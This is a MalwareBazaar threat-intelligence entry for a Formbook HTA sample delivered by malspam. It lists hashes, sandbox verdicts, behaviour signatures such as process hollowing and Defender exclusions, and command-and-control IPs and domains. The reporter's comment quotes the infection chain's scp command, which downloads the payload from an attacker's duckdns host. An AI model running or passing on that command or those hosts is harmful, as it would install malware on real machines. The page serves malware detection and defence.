MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Formbook


Vendor detections: 11


Intelligence 11 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8
SHA3-384 hash: d22df54a7eee16ed1041a8d30662578aafb02df8997d3f63827d0e9b012baca6dd65617c90ed69f1b93afcdae7c75fdb
SHA1 hash: 2482ade149122a56ece9aeb171f2296a958f4083
MD5 hash: e60881345186f019350a2971642549f4
humanhash: fillet-india-white-indigo
File name:DypP.hta
Download: download sample
Signature Formbook
Create hunting rule
File size:49'661 bytes
First seen:2023-08-09 14:55:43 UTC
Last seen:Never
File type:HTML Application (hta) hta
MIME type:text/html
ssdeep 768:3h9O2+94AQEdQzzZ3ZtBQl4+mVBz/z0hY:3h9O2XAAZbS4+mDz/z0G
TLSH T11F23A48D7C8539B0394A5CB5991F4CBD2970A9266A9A83F81610E7D05CF2CDEBBD3C4C
Reporter TomU
Tags:FormBook hta lnk SCP


Avatar
TomU
34a5deb851f292c65c8a1a64b938ca5a Request_for_Quotation.zip
5483f87473dc372d55856bd4f39a63f0 Request_for_Quotation.lnk

scp -o StrictHostKeyChecking=no cd@htaturnerforlifeboyyy.duckdns.org:/cd/AajQ C:\Users\user\AppData\Roaming\DypP.hta

e60881345186f019350a2971642549f4 DypP.hta
59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8 DypP.hta

Intelligence

File Origin
# of uploads :
1
# of downloads :
125
Origin country :
CH CH
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Trojan.DownLoader45.64783.30941.4132.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malicious
File Type:
HTA File - Malicious
Link:
https://app.docguard.net/59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/64d3a9044154db2bd523e83f/reports/ef4af799-9451-46a6-a058-d178249339e8/overview
Verdict:
Malicious
Labled as:
Trojan.EDCD920E
Link:
https://www.hybrid-analysis.com/sample/59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8
Result
Verdict:
MALICIOUS
Result
Threat name:
FormBook
Create hunting rule
Detection:
malicious
Classification:
troj.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1288664
Signature
Adds a directory exclusion to Windows Defender
Antivirus detection for URL or domain
C2 URLs / IPs found in malware configuration
Found malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Suspicious powershell command line found
System process connects to network (likely due to code injection or exploit)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected FormBook
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1288664 Sample: DypP.hta Startdate: 09/08/2023 Architecture: WINDOWS Score: 100 78 Snort IDS alert for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 6 other signatures 2->84 12 mshta.exe 19 2->12         started        15 NRGdELGVSZiWc.exe 5 2->15         started        process3 signatures4 112 Suspicious powershell command line found 12->112 17 powershell.exe 15 15 12->17         started        114 Multi AV Scanner detection for dropped file 15->114 116 Machine Learning detection for dropped file 15->116 118 Tries to detect virtualization through RDTSC time measurements 15->118 120 Injects a PE file into a foreign processes 15->120 22 NRGdELGVSZiWc.exe 15->22         started        24 schtasks.exe 15->24         started        process5 dnsIp6 64 179.43.175.187, 49697, 80 PLI-ASCH Panama 17->64 58 C:\Users\user\AppData\Roaming\TEST.exe, PE32 17->58 dropped 94 Powershell drops PE file 17->94 26 TEST.exe 6 17->26         started        30 conhost.exe 17->30         started        96 Modifies the context of a thread in another process (thread injection) 22->96 98 Maps a DLL or memory area into another process 22->98 100 Sample uses process hollowing technique 22->100 32 conhost.exe 24->32         started        file7 signatures8 process9 file10 60 C:\Users\user\AppData\...60RGdELGVSZiWc.exe, PE32 26->60 dropped 62 C:\Users\user\AppData\Local\...\tmp54D5.tmp, XML 26->62 dropped 104 Multi AV Scanner detection for dropped file 26->104 106 Machine Learning detection for dropped file 26->106 108 Uses schtasks.exe or at.exe to add and modify task schedules 26->108 110 2 other signatures 26->110 34 TEST.exe 26->34         started        37 powershell.exe 21 26->37         started        39 schtasks.exe 1 26->39         started        signatures11 process12 signatures13 86 Modifies the context of a thread in another process (thread injection) 34->86 88 Maps a DLL or memory area into another process 34->88 90 Sample uses process hollowing technique 34->90 92 Queues an APC in another process (thread injection) 34->92 41 explorer.exe 4 1 34->41 injected 45 conhost.exe 37->45         started        47 conhost.exe 39->47         started        process14 dnsIp15 66 riverlatte.com 192.254.187.94, 49698, 80 UNIFIEDLAYER-AS-1US United States 41->66 68 www.10510ydx.click 43.154.67.170, 49700, 49701, 80 LILLY-ASUS Japan 41->68 70 3 other IPs or domains 41->70 102 System process connects to network (likely due to code injection or exploit) 41->102 49 cmmon32.exe 41->49         started        52 raserver.exe 41->52         started        signatures16 process17 signatures18 72 Modifies the context of a thread in another process (thread injection) 49->72 74 Maps a DLL or memory area into another process 49->74 76 Tries to detect virtualization through RDTSC time measurements 49->76 54 cmd.exe 49->54         started        process19 process20 56 conhost.exe 54->56         started       
Detection:
formbook
Create hunting rule
Link:
https://mwdb.cert.pl/sample/59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8/
Threat name:
Script-WScript.Trojan.Htaload
Create hunting rule
Status:
Suspicious
First seen:
2023-08-09 14:56:06 UTC
File Type:
Text (VBS)
AV detection:
8 of 38 (21.05%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=lgtzdqyclwxrqmbssox4p3fe2luoz672pu4uf57dxvxjey2vhdea._file
Result
Malware family:
formbook
Create hunting rule
Score:
  10/10
Tags:
family:formbook campaign:oi24 rat spyware stealer trojan
Link:
https://tria.ge/reports/230809-sa1rcadg5s/
Behaviour
Creates scheduled task(s)
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Suspicious use of SetThreadContext
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Formbook payload
Formbook
Malware family:
FormBook
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/59a791c3025d/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:QbotStuff
Create hunting rule
Author:anonymous

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

Formbook

HTML Application (hta) hta 59a791c3025daf18303293afc7eca4d2e8ecfbfa7d3942f7e3bd6e92635538c8

(this sample)

  
Delivery method
Distributed via e-mail attachment

Comments